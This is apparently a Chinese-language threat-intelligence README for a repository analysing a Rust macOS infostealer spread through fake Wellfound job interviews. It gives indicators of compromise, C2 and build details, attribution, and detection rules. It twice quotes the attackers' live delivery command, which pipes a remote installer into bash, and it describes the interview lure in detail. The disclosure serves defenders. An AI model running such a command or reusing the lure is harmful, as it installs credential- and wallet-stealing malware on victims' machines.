完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层
威胁情报: 基于Rust的macOS通用二进制信息窃取器,通过Wellfound(原名AngelList)上的虚假面试流程投递。操作者身份为来自"HyperHive"的"Felix",诱骗目标从
macos.hyperhives.net运行恶意安装程序。本仓库记录了完整的静态分析:571个加密配置值已恢复,包括C2 URL、Sentry DSN以及276个被针对的Chrome扩展ID。
| 样本 SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 域名 | cloudproxy.link |
| 交付域名 | macos.hyperhives.net |
| 诱饵平台 | Wellfound(原名AngelList) |
| 操作者身份 | "Felix" 来自 "HyperHive" |
| VirusTotal | 9 / 63 检测 |
| 分类 | 公开披露 / IOC 包 |
| 最后更新 | 2026年4月 |
| 文件 | 格式 | 用途 |
|---|---|---|
iocs.txt | 纯文本 | 哈希、域名、URL、IP、邮箱、Sentry ID — 粘贴到黑名单、MISP、OpenCTI |
yara_rules.yar | YARA 4.2+ | 已知样本哈希匹配 + Mach-O 启发式字符串检测 |
sigma_rules.yml | Sigma | 代理、DNS 和进程创建规则 — 调整 logsource 以适应你的 SIEM |
stix/bundle.json | STIX 2.1 | 机器可读的CTI包,包含指标、恶意软件SDO、基础设施、ATT&CK模式及关系 |
attack-navigator-layer.json | ATT&CK Navigator | 导入 ATT&CK Navigator 查看可视化技术覆盖率 |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## 快速开始
将样本放在 `sample/installer_binary` 目录下(哈希验证请参见 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)),然后:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
The compose file enforces network_mode: none, read_only: true,并丢弃所有 Linux 功能。完整处理指南请参见 SECURITY.md。
在 Wellfound(原 AngelList)上的一则招聘信息引发了一个多邮件的社会工程链,来自操作者角色 "Felix" 和 "HyperHive"。在夸奖目标的技术背景并安排了一场虚假面试后,攻击者指示受害者“审查产品”于 hyperhives.net,并特别检查 Settings → Diagnostics → Log —— 这一借口旨在触发执行:```
curl -s https://macos.hyperhives.net/install | nohup bash &
该有效负载是一个**8.5 MB 的 Mach-O 通用二进制文件**(x86_64 + arm64),使用 Rust 编译。通过隔离的 Docker 实验室和 CPU 仿真对 **570 个独特的 x86_64 辅助例程**进行静态分析,恢复了**所有 571 个加密配置值**,揭示了:
- **C2:** `cloudproxy.link` — 四个 HTTPS 端点
- **Sentry(归属分析枢纽):** 完整的 DSN,包含 `ingest.de.sentry.io` 上的组织/项目 ID
- **构建身份:** Cargo 用户 `rootr`,代号 `force`,版本 `9.12.1`
- **目标:** 276 个 Chrome 扩展 ID(加密货币钱包、密码管理器、企业凭证)
这些策略与**朝鲜关联的 Contagious Interview** 活动一致——在合法平台上的虚假招聘、多步骤信任构建、`curl | bash` 交付、Rust macOS 窃取器以及针对加密货币的窃取。
---
## 1 — 攻击的起点
### 诱饵:Wellfound 上的虚假求职面试
攻击始于在 **Wellfound**(原 AngelList)上发布的一个**看似合法的职位信息**。目标申请后,以下邮件链从一位化名 **"Felix"**、公司名为 **"HyperHive"** 的操作者发出:
**邮件 1**(2026 年 4 月 4 日)—— 初次接触。"Felix" 确认了目标的简历和 LinkedIn,声称他们的"技术主管"批准了下一步,并特别提到了目标真实的技术经验。邮件称 HyperHive 正在"构建跨不同操作系统的 Hyperhives 桌面版本",并邀请目标在 UTC+0 时区安排面试。
**邮件 2**(2026 年 4 月 5 日)—— 后续安排。提议了具体的面试时间(2026 年 4 月 8 日 15:00 UTC),并包含了关键的有效负载交付指令:
> *"如果您可以的话,请也快速查看一下 **设置 → 诊断 → 日志** 下的产品日志。我们可能会要求您对日志以及您注意到的其他产品观察结果做一些简要评论,因为这通常是工程经验和关注细节的良好信号。"*
这将目标引导至 `https://hyperhives.net`,导航到诊断部分后触发了:```
curl -s https://macos.hyperhives.net/install | nohup bash &
该命令下载并执行了一个8.5 MB的 Mach-O 通用二进制文件。通过 AppleScript 弹出了一个虚假的 macOS 密码对话框。**密码未被输入。**进程立即终止,样本被保留供分析。
| 元素 | 详情 |
|---|---|
| 平台 | Wellfound (AngelList) — 正规求职网站 |
| 公司名称 | “HyperHive”(单数) / 域名 hyperhives.net |
| 虚拟身份 | “Felix” |
| 联系邮箱 | [email protected] |
| 建立信任 | 引用了目标真实的简历、LinkedIn 信息及具体技术技能 |
| 借口 | “面试前先体验产品” |
| 触发载荷 | 在 hyperhives.net 上操作“设置 → 诊断 → 日志” |
| 时间安排 | 虚假面试时间段(4月8日 15:00 UTC)以制造紧迫感 |
| 多步链条 | 载荷投递前至少两封邮件,历时两天 |
| 属性 | 值 |
|---|---|
| 文件 | installer_binary |
| 大小 | 8,504,768 字节 |
| 格式 | Mach-O 通用(x86_64 + arm64) |
| SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| SHA-1 | 2de897066c2fc7db91da78d7f9ded99237345077 |
| MD5 | 0e95ab4038ec48657563c96bed840dd5 |
| 编译器 | rustc 1.87.0 (stable) |
| 构建用户 | rootr(来自嵌入路径 /Users/rootr/.cargo/registry/...) |
| 构建代号 | force |
| 构建版本 | 9.12.1 |
| 错误追踪 | Sentry Rust SDK v0.36.0 |
| crate 数量 | 97(参见 output/cargo_dependencies.txt) |
该样本展现出生产级工程水准:语义化版本管理、Sentry 集成以保障运行可靠性,以及一个包含570个独特辅助函数加密的大型嵌入式配置。
完整报告 — 截至首次提交(2026年4月),63个引擎中有9个检测到。超过85%的引擎未能标记该样本。